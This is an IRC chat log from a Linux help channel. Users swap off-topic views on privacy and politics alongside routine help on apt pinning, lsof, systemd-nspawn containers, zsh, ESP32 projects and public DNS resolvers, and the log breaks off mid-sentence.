turbo64> why do you say that 16:36 < turbo64> what do you think about americans 16:36 < LissajousPattern> turbo64, are you? 16:36 < turbo64> yes 16:37 < LissajousPattern> ok 16:37 < loganrun> yeah after they raided trumps layer, I think it is safe to say privacy is gone 16:37 < rangergord> back. What's the last thing I said? 16:37 < LissajousPattern> turbo64, how much do you know about your birth certificate? 16:37 < rangergord> cause I made an impassioned defense of western civilization right there 16:38 < loganrun> but yeah other countries are much worse 16:38 < loganrun> except for cayman islands 16:39 < aaa_> this is possible to run some software in ram 16:40 < aaa_> does they will write logs in ram too? 16:40 < turbo64> LissajousPattern: i have it around here somewhere 16:40 < turbo64> are you one of those birther conspiracy guys 16:40 < LissajousPattern> turbo64, yeah its a very interesting document 16:40 < LissajousPattern> nah 16:40 < turbo64> rangergord: what about japan 16:41 < rangergord> aaa_: all software runs in RAM? They write logs in different places. What's your goal exactly? 16:41 < LissajousPattern> I had no idea there were conspiracies in regards to that 16:42 < turbo64> its in the eastern hemisphere and its an economic superpower that makes the most technologically advanced products on earth, citizens have universal access to healthcare and education, and they have the lowest crime rates in the world 16:42 < rangergord> turbo64: what about it? just because their companies haven't been at the forefront of monetizing user data, doesn't mean much. For all we know they're doing it, the news just never reaches us. 16:42 < LissajousPattern> whats a birther...? other than the obvious which I would assume would be a mother...? 16:42 < turbo64> oh and longest life expectancy 16:42 < loganrun> the swiss are apparently #1 when it comes to privacy, but I think with the multinational online companies privacy is gone. we have no idea how much they are tracking. 16:43 < LissajousPattern> or at least some sort of female thing 16:43 < turbo64> well your point that western countries are more advanced in terms of social progress is kind of disproven by japan 16:43 < loganrun> japan rocks, they don't even riot 16:43 < rangergord> turbo64: yeah Japan's ahead of many western countries, most people consider them a western country. idk what makes them special, and why their civilization's success was not replicated elsewhere in Asia. 16:43 < turbo64> and privacy is respected much more in japan 16:43 < turbo64> probably the most private culture on earth 16:43 < rangergord> we don't know that 16:44 < turbo64> consider them a western country?? 16:44 < rangergord> we don't know if their government is tapping their ISPs 16:44 < triceratux> https://en.wikipedia.org/wiki/Barack_Obama_citizenship_conspiracy_theories 16:44 < turbo64> have you not seen a globe before 16:44 < turbo64> or do you have some bizarre defintion of the word "western" that im not familiar with 16:44 < rangergord> turbo64: rephrase that as "country with values usually found in western countries" 16:45 < LissajousPattern> Truth be told Japan is both eastern and western, at least if you live in North America 16:45 < LissajousPattern> weird how that works living on a globe 16:45 < turbo64> you guys should just stick to linux discussion imo 16:45 < turbo64> you're way out of your depth here lol 16:46 < rangergord> turbo64: and you ranting about America allowing Facebook to exist shows you're floating on the surface 16:46 < LissajousPattern> depth...? let me know when I should start paddling. 16:46 < turbo64> i never said anything about america allowing facebook to exist 16:47 < rangergord> this all started when you used Facebook as a counter-example when I complained about the total lack of online privacy in China 16:47 < turbo64> i was saying out culture doesnt value privacy at all because everyone wants to have a facebook page and give all their personal information to some big corporation just because all their friends are doing it 16:47 < jim> rangergord, turbo64: ok, back to neutral corners :P 16:47 < rangergord> no, seconds out! 16:47 < LissajousPattern> I love facebook for the fact that they allowed themselves to get so big that the rest of us can't help but notice the corruption that obviously ensued. 16:47 < rangergord> in any case, the Internet was a mistake 16:47 < turbo64> well you were saying that chinese people have no concept of privacy 16:48 < rangergord> western civ had a good run. Peaked in the 90s. 16:48 < LissajousPattern> what better way to try to wake up tons of people all at once 16:48 < LissajousPattern> quite brilliant actually 16:48 < turbo64> which i think was hypocritical coming from someone in europe or the us 16:48 < loganrun> it is rather impressive how well certain countries are able to censor citizens. I think western countries are quickly moving in that direction. 16:48 < rangergord> turbo64: most of the privacy advocates, like 99.9%, are westerners. China will never ever have someone like Snowden, that mentality simply doesn't exist. 16:48 < turbo64> where privacy is bought and sold as a massive multibillion dollar industry 16:49 < LissajousPattern> although I think its still an unintended consequence, because Mark Z is really not that bright to begin with. 16:49 < rangergord> I don 16:49 < turbo64> rangergord: its not that the mentality doesnt exist, its that people dont want to be killed or imprisoned for life 16:49 < rangergord> I don't even use Facebook or any social media except an anonymous reddit account, don't get me wrong 16:50 < loganrun> it was never quite explained why he only leaked stuff about the USA 16:50 < loganrun> I mean wiki 16:50 < rangergord> turbo64: no, newer generations literally don't believe in it. They grew up in a world with no exposure to these ideas. Like you can't google "democracy" in China. 16:50 < turbo64> if you're familiar with history, you'd know that chinese people aren't afraid of civil disobedience 16:50 < rangergord> turbo64: that was in an age before the gov had the tech to completely control what ideas their citizens are exposed to 16:50 < LissajousPattern> the internet itself was basically built off the concept of "social networking" the Internet is in fact just one big social network. 16:50 < rangergord> LissajousPattern: that's why I say the Internet was a mistake. Humanity was better off without it. 16:51 < loganrun> turbo64: seriously, of course they are, there is none 16:51 < LissajousPattern> possibly 16:51 < loganrun> LissajousPattern: started as a military network I thought 16:51 < turbo64> also you can google the word democracy in china lol 16:51 < jim> rangergord, turbo64: would it make sense to move this cultural/political discussion to pm or to another channel? 16:51 < rangergord> jim: no worries, I'll drop it 16:52 < triceratux> http://www.baidu.com/s?wd=democracy 16:52 < LissajousPattern> longhorn, well let me say the web as we the "public" know it 16:52 < turbo64> well the other day everyone was arguing about assembly language so i figured this channel had a sort of laissez-faire attitude towards offtopic discussion 16:52 < turbo64> but alright ill stop 16:52 < LissajousPattern> sorry loganrun 16:52 < turbo64> i tried the new fedora 28 beta 16:52 < LissajousPattern> that was @ you 16:52 < jim> thank you 16:52 < turbo64> it seems like they are trying to do stuff like ubuntu does 16:52 < turbo64> they took a lot of functionality out of the anaconda installer and you cant create a root password or even set the hostname now 16:53 < turbo64> i have no idea why they did that but everyone thinks its stupid 16:53 < LissajousPattern> off topic convo is gonna happen sometimes but knowing when to say when goes a very long way. Or so I have learned rom IRC. 16:53 < loganrun> LissajousPattern: yeah it was meant to be able to keep working in the event of war 16:53 < rangergord> whatever happened to SteamOS? Windows killer, etc 16:54 < turbo64> valve went through like a phase where they cared about linux 16:54 < turbo64> and it ended pretty fast 16:54 < turbo64> now they dont even update their steam client for linux 16:54 < LissajousPattern> loganrun, yeah I am really big into communications on general so all topics relative fascinate me 16:54 < turbo64> it uses like an ancient gtk that doesnt support any new theme engines in the context menu, you cant disable the tray icon even though tray icons were phased out in linux years ago 16:55 < LissajousPattern> so windows is going to release a linux based OS...? 16:55 < aaa_> i was talking about tempfs 16:55 < LissajousPattern> why is no one talking about that? 16:55 < aaa_> etc 16:55 < LissajousPattern> or I should say Microsoft 16:55 < jim> turbo64, it's a bit laissez-faire, and, the offtopics I tend to allow are brief, a few minutes max, and tends towards lightening 16:55 < LissajousPattern> silly me 16:56 < turbo64> for a while i was clinging to old stuff like desktop icons and tray icons but after using gnome a while i dont miss them 16:56 < turbo64> its just unnecessary redundancy 16:56 < rangergord> LissajousPattern: as someone in the embedded world, I doubt people will use Windows anytime soon. Do you know how much they jerked us around? Windows CE, Windows Mobile, Windows Phone, stuff getting end-of-lifed after like 5 years which is NOTHING in this world 16:56 < turbo64> i felt the same way about the start menu in windows, people got pissed off about it being removed in windows 8 16:56 < rangergord> we have to support our product for 20 years. It's Linux all the way now. 16:57 < turbo64> but if you actually think about it, since they added that search feature how often do you actually go through your start menu 16:57 < jim> heh :) if they do, theyve roped themselves into complying with gpl v2 16:57 < LissajousPattern> yeah Microsoft sucks pretty mega hard 16:57 < turbo64> when its so much faster to just type in the first couple letters of what you want to run and hit enter 16:57 < loganrun> turbo64: only when I forget the name of something 16:57 < Frith> How many apps do people use on a machine these days, anyway? 16:57 < Frith> Browser, games, maybe word. 16:57 < LissajousPattern> dumb joke 16:58 < turbo64> well you dont even need to know the name of the program a lot of hte time 16:58 < Frith> Potentially Excel. 16:58 * jim misread apps as apes... oops 16:58 < rangergord> Frith: average person, or power user? 16:58 < Frith> rangergord: Either. 16:58 < turbo64> you type in text editor and gedit pops up or whatever it is 16:58 * LissajousPattern about to ditch windows for good this timee 16:58 < turbo64> ive never not known the names of programs installed on my computer personally 16:58 < Frith> This is one reason that chromebooks have reasonable success. 16:58 < MrNeon> turbo64: the search functionality in Windows is broken, sometimes writing the first three letters shows no results at all but four letters does. 16:58 < turbo64> i cant think of any situation where i want to run a program that i dont know the name of 16:59 < turbo64> well yeah its pretty shitty but the idea is good 16:59 < rangergord> Skype, Outlook, keepass, firefox, virtualbox, cherrytree, dropbox, filezilla, mobaxterm, VLC, foobar2000, Notepad++, Skype, bittorrent, various games 16:59 < turbo64> and gnome does it better 16:59 < turbo64> windows has good ideas and bad implementations 16:59 < rangergord> Linux would've eaten Windows's lunch if they just focused on making one polished UI instead of 10 half-breeds 16:59 < turbo64> like the start screen i think was a good idea but the way they implemented it was straight up retarded 16:59 < turbo64> with the giant tiles and all that 16:59 < Frith> rangergord: You did skype twice, and most of those have browser intergrations. 16:59 < azarus> rangergord: nope 17:00 < azarus> rangergord: the UI I use feels polished enough as it it 17:00 < turbo64> and the search feature is a great idea but after installing a lot of things it becomes slow and shitty, like the rest of windows does 17:00 < Frith> rangergord: That would be ChromeOS. 17:00 < azarus> it is* 17:00 < turbo64> thats just windows rot though, no way to fix that 17:00 < rangergord> azarus: the rest of the world disagrees. Also part of it would be a unified way to do graphics, sounds, etc, so we get decent video drivers and tools like on Windows 17:00 < rangergord> the whole OS should've been systemd'ed to beat Windows 17:00 < azarus> rangergord: sources on that? 17:01 < rangergord> azarus: Netcraft 17:01 < azarus> user counts are not in any way meaningful 17:01 < loganrun> the think that ticks me off about microsoft is you have no idea what the heck is going on under the hood most of the time. they just add so many layers of complexity to everything it seems like 17:01 < azarus> also, absolutely not accurate 17:01 < twainwek> to beat windows? i'm willing to pay good money to never be forced to use windows anywhere 17:02 < loganrun> agreed 17:02 < djph> twainwek: zOS? 17:03 < loganrun> what about apple os 17:03 < rangergord> not a fan personally 17:04 < rangergord> I can't tell if all Apple products are an elaborate hidden camera show designed to make me wonder if there's something wrong with me 17:04 < rangergord> cause I don't see how people like OSX and iOS 17:04 < Frith> What's wrong with BSD? 17:04 < djph> the "ooh shiny" aspect? 17:05 < LissajousPattern> rangergord, its called brainwashing 17:05 < loganrun> ha 17:05 < loganrun> shiny is good 17:05 < LissajousPattern> through clever marketing 17:05 < aaa_> if i run tmpfs in encrypted folder 17:05 < aaa_> content will be encrypted in mem or no? 17:05 < turbo64> Frith: you might as well ask, whats wrong with a zx spectrum 17:05 < rangergord> aaa_: yes 17:05 < djph> isn't tmpfs just in-ram? 17:06 < turbo64> or whats wrong with a dictophone 17:06 < rangergord> RAM [ ] 17:06 < Psi-Jack> I care nothing for the Apple marketting. Just the results of their product. And, well, I use an iPhone, iPad, and my wife uses an iMac. None of this is really relevant to Linux though. 17:06 < turbo64> theres nothing inherently wrong with them, but theyre old and not very useful in 2018 17:06 < turbo64> when we have newer things that do everything better 17:06 < aaa_> why yes ? you are sure ? 17:06 < aaa_> well i will verify anyway when i will setup 17:07 < fendur> rangergord: linux doesn't have the same foundational philosophy as windows/macos. few people who recognize the real value of linux care about selling it to the masses and making it the most popular. Think about what open source is, what it represents, what sorts of development it naturally leads to, why it works... 17:07 < rangergord> I was trying to figure out why I couldn't transfer files from the OSX desktop to an external drive. No idea. No error messages, no indication of why. That's the supposed user-friendly OS? Only if your definition of "user" is someone who never copies a file except to TEH CLOUD 17:07 < Psi-Jack> rangergord: Maybe you need #macos? 17:08 < fendur> it's evolutionary in nature, it's not being designed by one central agent. 17:08 < LissajousPattern> rangergord, I assume IOS still does not have its own built in file manager either... 17:08 < aaa_> ?? 17:08 < rangergord> Psi-Jack: what I mean is, if I, as a power user (albeit using OSX for almost the 1st time), couldn't figure it out, what hope does the average user have? 17:08 < Psi-Jack> LissajousPattern: Actually it does. 17:08 < LissajousPattern> Psi-Jack, oh wow 17:08 < LissajousPattern> when did that happen? 17:08 < aaa_> what other way in can encrypt in ram? 17:09 < Psi-Jack> LissajousPattern: I believe iOS 11. 17:09 < rangergord> aaa_: what are you trying to do? 17:10 < prussian> aaa_: by owning a CPU that supports a memory controller that can do it 17:10 < Psi-Jack> rangergord: My neophyte wife has had no issues with her iMac. :) 17:10 < aaa_> lol i cant control what the datacenter have 17:11 < djph> Psi-Jack: sounds like a pebcak error 17:11 < aaa_> i want to deny log 17:11 < djph> so then ... *don't log* 17:12 < aaa_> how to do? 17:12 < loganrun> I don't waste time configuring my iphone because there is nothing to configure really. this isn't the case with linux. apple really appeals to those with little computer knowledge I think. 17:12 < Psi-Jack> djph: Yep. 17:12 < LissajousPattern> aaa_, you do by don'ting 17:12 < rangergord> aaa_: what's your 1st language? 17:12 < aaa_> lol this is for service like ssh or webserv bro 17:13 < djph> aaa_: so? you don't have to log those either. Probably a slightly *bad* idea to not log anything, but you can definitely do that if you so choose. 17:13 < rangergord> aaa_: so you want your system's application logs to be encrypted, instead of located in /var/log (or systemd)? 17:13 < rangergord> and you WANT to log, instead of DISABLING LOG? 17:14 < rangergord> what is the benefit here? what are you trying to stop? 17:15 < rangergord> starting to think he's a troll 17:15 < djph> or just a non-native English speaker. 17:15 < pankaj> Many times I have to press my space key again and again to make it work. It is not loose and does not have any mechanical problem. Even thier is something like hysterises going in my keyboard. What should I do. 17:15 < loganrun> https://redmondmag.com/articles/2017/09/13/is-windows-10-conditioning-us-linux.aspx 17:15 < djph> pankaj: get a new keyboard. 17:15 < aaa_> or both. 17:16 < aaa_> no seriously i didnt know i can disable log, i found what i wanted thanks 17:16 < rangergord> I'm off to sleep. aaa_: just install your OS on an encrypted partition. If your system is running on an online provider (like a VPS), then this is all in vain since they can see everything you do. That's it. 17:16 < LissajousPattern> pankaj, repair it 17:16 < aaa_> systemctl disable rsyslog 17:16 < aaa_> , right ? 17:16 < LissajousPattern> take it apart and visual inspect it 17:16 < pankaj> djph: I am using laptop. I think the problem is not keyboard but my system that hangs again and again. Is their anylysis tool in linux that can help me to locate problem on my destro. 17:17 < LissajousPattern> ah I see 17:17 < LissajousPattern> pankaj, which distro? 17:18 < pankaj> LissajousPattern: I am on archlinux. 17:18 < pankaj> LissajousPattern: I mean a standard analysis tool in linux which helps me to find problem in linux. 17:19 < pankaj> LissajousPattern: My hard disk space is not problem but still it hangs even though I update regularly and no high RAM eating program in installed 17:20 < marktr> pankaj: htop 17:20 < LissajousPattern> that is strange 17:20 < marktr> Or historically, atop with the kernel module 17:20 < pankaj> marktr: Are their any other tools available 17:21 < marktr> To check what? CPU usage? Kernel errors? 17:22 < pankaj> marktr: ALso their are many programs listed with htop. Also some programs may see using huge memory but may be it is important to Operating system. How to identify a fraud or bad program running in background. 17:22 < pankaj> marktr: What do you use. 17:23 < Guy1524> Hey guys, I need my computer rebooted right now, but I am at school. Is there any way to do this without ssh running on the PC 17:23 < dgurney> Guy1524, without any means of remotely connecting to it, no 17:23 < dgurney> I guess you could ask someone to reboot it for you if anyone else is home 17:24 < Guy1524> ah, that stinks, I forgot to start my ssh service this morning ): 17:24 < Guy1524> yeah, I've tried 17:24 < Guy1524> but they aren't responding 17:24 < djph> ... forgot to start...? whaa? it's a daemon, it should be up all the time... 17:25 < dgurney> well not everyone has it enabled at all times 17:25 < Guy1524> yeah, on my arch install I've forgotten to do that 17:25 < Guy1524> but if rebooted, it will go into my Ubuntu install 17:25 < Guy1524> which has that enabled 17:26 < twainwek> send a request to a three letter agency and they may honor your request 17:27 < fendur> NSA? 17:27 < lite4y> how can we see what files a particular process opened? 17:27 < Frith> lsof 17:27 < zoologist> lsof 17:27 < twainwek> lsof 17:27 < tomato> lsof 17:28 < rumpel> lsof 17:28 < zoologist> you guys are way too fast 17:28 < dgurney> are you sure he got the tool name? should it be repeated just in case? :P 17:28 < fendur> lsof 17:29 < fendur> what do I win? 17:29 < Lope> I tried blacklisting a package but it keeps coming back :( 17:29 < tomato> Lope: what package, what package manager, what distro 17:29 < Lope> Ah, was getting to that. Ubuntu, apt-get and and all the grub packages. I'll pastebin. 17:31 < lite4y> if i do a cat /proc/1/status. the status shows its sleeping 17:31 < Lope> https://hastebin.com/nixonitubi.rb 17:31 < lite4y> why generally the init process sleeps 17:32 < Psi-Jack> Yes, lsof, list open files. 17:32 < Lope> The above paste shows my attempt to blacklist grub-pc and grub-common etc, but it keeps coming back. Any ideas? 17:33 < THX1338> Lope, what are you trying to do? 17:33 < Lope> I want to prevent grub from being automatically installed when I run apt-get upgrade or apt-get dist-upgrade 17:34 < Psi-Jack> lite4y: Because, it has nothing to do. 17:35 < djph> Lope: pin it? 17:35 < Lope> djph: I tried pinning grub to stop it from automatically installing on apt-get upgrade but it still keeps coming back from time to time: https://hastebin.com/nixonitubi.rb 17:36 < Lope> should I make the priority lower? 17:37 < THX1338> Hm, idk bro, sorry. Did you already read this link -> https://askubuntu.com/questions/196037/blacklisting-grub-packages-from-installing ? 17:39 < Lope> Apparently this worked, which is slightly different to what I tried... https://askubuntu.com/questions/75895/how-to-forbid-a-specific-package-to-be-installed 17:43 < Lope> I've got 2 of the same ubuntu distros on the same computer. Is it safe to perform an apt-get upgrade etc inside a chroot? 17:44 < Lope> Normally I've done apt-get upgrade chrooted inside minimal headless distros, never a full desktop OS. 17:44 < mawk> yes 17:44 < mawk> but you've got better things than a chroot 17:44 < mawk> to mimic exactly what it would be if you really booted inside 17:45 < mawk> don't worry it's just one command: install the systemd-container package 17:45 < Lope> so basically I've got OS1, I upgrade it, then I rsync it's /var/cache/apt/archives into OS2. Then I chroot into OS2, then apt-get upgrade OS2 ? 17:45 < mawk> then you do sudo systemd-nspawn -b -D folder 17:45 < mawk> and you're into the OS inside the folder, you can upgrade whatever you want 17:45 < Lope> well, it's not a container, it's a full OS... ? 17:45 < Lope> O 17:45 < mawk> same thing 17:45 < Lope> Wow. okay. I want to automate it also. 17:46 < mawk> you can do the same thing but without booting, à la docker 17:46 < mawk> sudo systemd-nspawn -a -D folder yourcommandgoeshere 17:46 < mawk> it won't spawn the init daemon so you won't have all the bells and whistle a full upgrade could require, tho 17:46 < Lope> So basically I run a command. It upgrades OS1 which is running, then rsyncs deb cache into OS2, then upgrades OS2 automagically. 17:47 < mawk> yes 17:47 < Lope> mawk: amazeballs. Okay is it as simple as that one command, or should I open some wiki about it? 17:47 < Lope> I used to do rbind and shit. 17:47 < mawk> why rsync ? couldn't you just copy the deb cache ? 17:47 < mawk> it's just one command 17:47 < Lope> well I want to delete the old deb packages. 17:47 < Lope> rsync --delete 17:47 < Lope> it's already done. 17:47 < mawk> that command shares the network with the host, so the ssh daemon inside won't start 17:48 < mawk> also you could experience some other minor networking issues 17:48 < mawk> but you can just add a flag to isolate the network and setup NAT ! all in one flag 17:48 < Lope> yeah i don't need networking inside OS2 while upgrading it. 17:48 < Lope> well, I don't need daemons running I should say. 17:48 < mawk> then go with the default, it will share the host network 17:48 < Lope> Cool 17:49 < Lope> Amazing. 17:49 < mawk> otherwise you enable systemd-networkd in both sides, and you add "--network-zone net" to the nspawn command line 17:49 < mawk> it will create a bridge and plug all your VMs on it, and automatically do NAT 17:50 < mawk> all the containers can talk to each other, they can talk to the host, go to internet, etc 17:50 < mawk> it's pretty useful to setup a network lab for testing, using btrfs 17:50 < Lope> what package do I need to remove to get rid of the GUI package manager in ubuntu? It locks my apt sometimes. Annoying. 17:50 < mawk> you spawn new containers in less than a second 17:50 < mawk> dunno how it's called 17:50 < mawk> you could check the executable path then feed that to apt-file to get the package name 17:50 < mawk> or using dpkg rather 17:53 < shan> How do I make Linux save everything like windows does 17:53 < garylabronz> ctrl+s 17:54 < shan> Like, it stores all your open windows and shuts down 17:54 < jim> what's "everything"? 42 - the meaning of life - the universe? 17:55 < jim> oh I see 17:55 < fendur> my laptop does this when I shut the lid. 17:55 < shan> jim: all open windows and program states 17:55 < shan> fendur: how? 17:55 < Lope> mawk: how does systemd container stuff relate to LXC and LXD? 17:55 < shan> I mean fully shut down 17:55 < shan> Halt 17:55 < twainwek> windows does that now? 17:56 < twainwek> shan: KDE does that out of the box 17:56 < garylabronz> Lope: not sure I'm following your question? 17:56 < fendur> shan: oh. I was thinking "suspend" 17:56 < shan> twainwek: since windows 8 17:56 < jim> it would need to "send a message" to each app/program 17:56 < fendur> shan: by "halt" do you mean even more than "hibernate"? 17:56 < shan> Yeah 17:56 < shan> Halt 17:56 < shan> shutdown -h now 17:56 < jim> powerdown? 17:56 < jim> ok 17:56 < ananke> shan: that's often specific to desktop environments 17:57 < mawk> https://www.google.com/search?q=speedtest 17:57 < mawk> Lope: it's the same technology inside 17:57 < mawk> using namespaces from linux 17:57 < shan> jim: yeah 17:57 < mawk> but nspawn doesn't use lxc 17:57 < ananke> shan: google for + 'restore session' 17:57 < mawk> and lxd is just a wrapper around lxc, for convenience 17:58 < jim> it's going to be an ongoing project, for now, I would recommend saving stuff you're working on before you shut down 17:58 < Lope> mawk: so if I want to make and use containers for stuff like web servers and so on as a lightweight alternative to a VM, should I use systemd containers or LXC/D 17:58 < shan> Also, how do I make a script to listen for certain data over serial to execute system commands 17:58 < mawk> systemd-nspawn isn't said to be safe enough for production, Lope 17:58 < mawk> but I believe that when you use the private users feature it's good enough 17:58 < Lope> is live migrate safe with LXD yet? 17:59 < mawk> and it's very well integrated with systemd, that's a good point 17:59 < Lope> mawk: do you think LXD is safe for production? 17:59 < jim> what is the serial link connected to? 17:59 < mawk> live migrating a container from two normal computers is a hard thing to do 17:59 < shan> jim: it's part of a project to automatically shut my computer down when power loss is detected 17:59 < garylabronz> if you are comfortable with systemd, I would use systemd to manage lxc/lxd. and i run docker in production 17:59 < Lope> mawk: what are you saying is well integrated in systemd? 17:59 < mawk> Lope: LXD is just the wrapper so we're talking about LXC, yeah I guess it's good enough 17:59 < mawk> systemd-nspawn 17:59 < Lope> mawk: okay 17:59 < mawk> = systemd-container, dunno why the package name is different 17:59 < shan> jim: the other side is an esp32 18:00 < jim> shan, UPSes do that too 18:00 < ananke> shan: get a smart UPS 18:00 < Lope> does live migrating KVM VM's work well? Seems like it's used in production... 18:01 < jim> in the event of powerloss, a UPS gives you time to save 18:01 < shan> ananke, jim: budget too damn low, plus I want to be able to brag and I want it to be completely FOSS 18:01 < ananke> shan: so how do you propose to shut down gracefully if there is no power? 18:01 < shan> A ups is going to be part of the equation 18:02 < shan> ananke: im buying a ups, but a cheap one. 18:02 < ananke> shan: price difference between smart ups and a dumb one is on par of the cost of esp32 18:02 < jim> shan, yes, it it 18:02 < jim> it is 18:02 < shan> I need it to be automated so that I can use my computer remotely 18:02 < shan> ananke: budget == $35 18:03 < shan> In India 18:03 < ananke> shan: and using a smart ups makes it much easier, because of the existing software that handles it. such as apcupsd, nut, etc 18:03 < Strykar> a ups without USB/Serial is so 90s 18:03 < shan> :((( but I wanna go the Diy route 18:03 < ananke> Strykar: as opposed to what? 18:03 < fendur> shan: I know you're up to something and it might be best for you, but consider a VPS for this purpose. 18:04 < jim> shan, $35 is probably not going to get you a smart ups 18:04 < ananke> shan: great. google.com has tons of resources then 18:04 < shan> I know 18:04 < shan> The smart part is going to be an esp32, jim 18:04 < Strykar> dumb UPS's that turn off when the voltage drops too low and there's no way for the PC to know 18:04 < jim> what;s an esp32? 18:05 < prussian> some weird wireless radio package with all sorts of stuff 18:05 < ananke> jim: microcontroller 18:05 < jim> oh ok 18:06 < jim> the thing of it is, I think you're doing the right project 18:06 < jhaenchen> esp82666 or whatever the popular one is always nice 18:06 < ananke> continuation/second generation of esp8266. originally meant to work as a wifi controller to be integrated with other products, but became very popular when folks realized it's very inexpensive and quite capable 18:06 < blip99> hi all. As a normal user, do I lose anything by moving from bash to zsh? I'm doing so simply in order to use plugins that help with development (E.g. showing git branch etc). Looks like the zsh universe has more plugins e.g. https://github.com/caiogondim/bullet-train.zsh 18:06 < jim> someone gave me an arduino-alike 18:07 < blip99> I have modifications in my .bashrc related to history and other simple stuff like that, guess i can replicate in zsh 18:07 < jhaenchen> god i'd love to build an IoT app for that. it's like $10 and can make a web request when a GPIO port is triggered. That's almost everything you need. 18:07 < frostschutz> blip99, as long as you don't uninstall bash since there will be scripts that use #!/bin/bash specifically - you can use any shell you like 18:07 < jhaenchen> Current next proj is an infared laser to turn on my lights when i walk up the stairs 18:07 < ananke> jhaenchen: you can get esp8266 dev boards for $3 18:07 < jhaenchen> oh yeahhhh boiii 18:07 < jhaenchen> noice 18:08 < ananke> jhaenchen: look at 'wemos d1 mini' and 'nodemcu' boards 18:08 < shan> jim: cheap IoT microcontroller with WiFi + bt 18:08 < ananke> wemos d1 mini is smaller, while nodemcu exposes a few more pins 18:08 < blip99> frostschutz, aah right. I see. and generally my system/programs should be unaffected by zsh being default shell? 18:08 < jhaenchen> cheers ananke 18:09 < jim> shan, so really, you want to make a smart ups out of a cheap/dumb one? 18:09 < frostschutz> blip99, yup 18:09 < jhaenchen> $2, my god. 18:09 < ananke> best thing is that you can either program them like an arduino controller (with a few small changes in pin numbering and board specific libs), or you can use something like a lua or micropython based firmware 18:10 < jhaenchen> That's insanely cool 18:10 < ananke> jhaenchen: you get a dozen of them and you don't have to be concerned how well you treat them 18:10 < ananke> jhaenchen: also, there are existing firmware projects that turn those into very cool gadgets. google for 'espeasy' and 'esp-link' 18:12 * Psi-Jack links in. 18:13 < jhaenchen> MQTT support, cool. That means AWS IoT 18:13 < anickname> hey 18:13 < anickname> I'm trying to run puppy linux inside a virtual machinwe 18:14 < anickname> and I'm trying to attach a virtual disk to it 18:14 < anickname> so I need to run gparted, and it asks me to select a partition typer 18:14 < anickname> which one do I use? msdos? 18:14 < ananke> anickname: yes. unless the disk is over 2TB, which would require gpt 18:14 < ananke> or you can use gpt 18:15 < Psi-Jack> jhaenchen: Or RabbitMQ. :) 18:15 < Lope> mawk: I tested the systemd `systemd-nspawn -a -D /foo bash` command. Works nicely. 18:15 < blip99> ty frostschutz 18:15 < Lope> Do you have any suggestions for making /etc/resolv.conf work inside the systemd-spawned container? 18:16 < Lope> It's not a real container. It's actually another distro on my PC. So I don't want to delete the link `resolv.conf -> ../run/systemd/resolve/stub-resolv.conf` 18:16 < anickname> ananke: what's the difference between msdos, gpt, bsd, etc. 18:16 < Lope> I suppose I could overwrite the destination? 18:17 < ananke> anickname: you can look those up if you want. 18:17 < anickname> ananke but msdos is the best one 18:17 < Lope> problem is /run/ doesn't exist when inside the systemd container spawn. 18:17 < Trel> When composing an email message in Pine/Alpine, is there any way to choose/change the SMTP server or am I restricted to the default and anything a role may have overridden? 18:18 < ananke> anickname: it's the easiest one to deal with, because everything will support it. 18:18 < mawk> nice Lope 18:18 < blip99> frostschutz, can I somehow export my bash history to zsh? got tons of dev commands in there 18:18 < zhangxaochen> I'm trying to remove a package, result in 'unmet dependencies', why? http://codepad.org/EtQsdWA5 18:19 < Lope> mawk: it says to press something 3x to escape, what is that? 18:19 < mawk> Lope: but keep in mind that not using -b doesn't give you the full power of the OS inside, it's just using as much possible of a container without actually booting it 18:19 < mawk> ^]^]^] 18:19 < Lope> Yeah what button is that? 18:19 < mawk> you press ctrl-] three times to kill it 18:19 < mawk> it's ctrl and ] at the same time 18:19 < Lope> Thanks! 18:19 < Lope> That's pretty awesome! 18:19 < anickname> thnak you 18:19 < mawk> yeah 18:20 < blip99> frostschutz, guess I can simple append the contents to .bash_history to .zsh_history lol 18:20 < anickname> ananke what file system should I use, ext4 right 18:20 < frostschutz> blip99, I don't use zsh myself so no idea if they have a special format for their history. otherwise you could just copy it 18:21 < dgurney> anickname, if you don't know what fs to use, ext4 is a good choice 18:21 < ananke> anickname: sure 18:21 < Lope> mawk: any quick hacks to get the network working? 18:21 < mawk> the network works by default Lope 18:21 < mawk> if you don't pass flags about it 18:21 < anickname> thank you 18:22 < mawk> it's the same network as the host 18:22 < mawk> you'll maybe need to adjust the DNS servers 18:22 < mawk> you can temporarily use 9.9.9.9 as your dns server inside the container 18:22 < Lope> mawk: okay my bad. I added -n (was reading stuff on arch, got it working) 18:23 < Lope> mawk: surely you mean 8.8.8.8 ? 18:23 < mawk> no, 9.9.9.9 18:23 < mawk> but 8.8.8.8 would work too 18:23 < dgurney> 1.1.1.1 is also pretty neat 18:23 < Lope> I've never heard of 9.9.9.9 18:23 < Psi-Jack> Who runs 9.9.9.9 anyway? 18:23 < Lope> 8.8.8.8 and 8.8.4.4 are the old ones 18:23 < mawk> some french guys 18:23 < mawk> related to the french NIC 18:23 < Psi-Jack> 1.1.1.1 and 1.0.0.1 are good though. 18:24 < Psi-Jack> mawk: Oh. That... Doesnt' inspire confidence. 18:24 < mawk> that probably care about private life and all 18:24 < mawk> lol 18:24 < mawk> :( 18:24 < mawk> 9.9.9.10 is the one without the malware filter, if you don't like that 18:24 < Lope> which one lets NSA track all your requests? 18:24 < mawk> cloudflare, of course 18:24 < mawk> it's american 18:24 < dgurney> and so is google 18:25 < Psi-Jack> I'm going to be setting up DNS over TLS pretty soon. :) 18:25 < Lope> anyone watch snowden 2016. wow. was intense. 18:25 < marktr> 1.1.1.1 is supposedly very private 18:25 < mawk> 9.9.9.9 does it 18:25 < Psi-Jack> Lope: I've watched all the documentaries about Snowden. 18:25 < Psi-Jack> marktr: And very FAST. 18:25 < Lope> Psi-Jack: the first snowden one was like a thriller. 18:26 < be2pal> Opennic ? 18:26 < Psi-Jack> be2pal: What about it? 18:26 < Psi-Jack> Lope: Rightfully so. 18:26 < Lope> dgurney: Psi-Jack: i thought you were pulling my leg about 1.1.1.1 and 1.0.0.1 18:26 < be2pal> Secure as 1.1.1.1 ? 18:26 < dgurney> why would we pull your leg? 18:27 < Lope> dgurney: people like to prank. 18:27 < Psi-Jack> Lope: Nope. It's real. And new. 18:27 < Lope> It looks a little bit like 10.0.0.1 :p 18:27 < dgurney> if you're a big enough company with the ability to negotiate, you can easily get cool IP addresses 18:27 < Psi-Jack> be2pal: You mean opendns? 18:27 < JimBuntu> dgurney, but do you really want the ones that have been used for all sorts of whacky testing? lol. CloudFlare can handle it though. 18:28 < Lope> So is 1.1.1.1 the one where you think it's more private but when you use it the 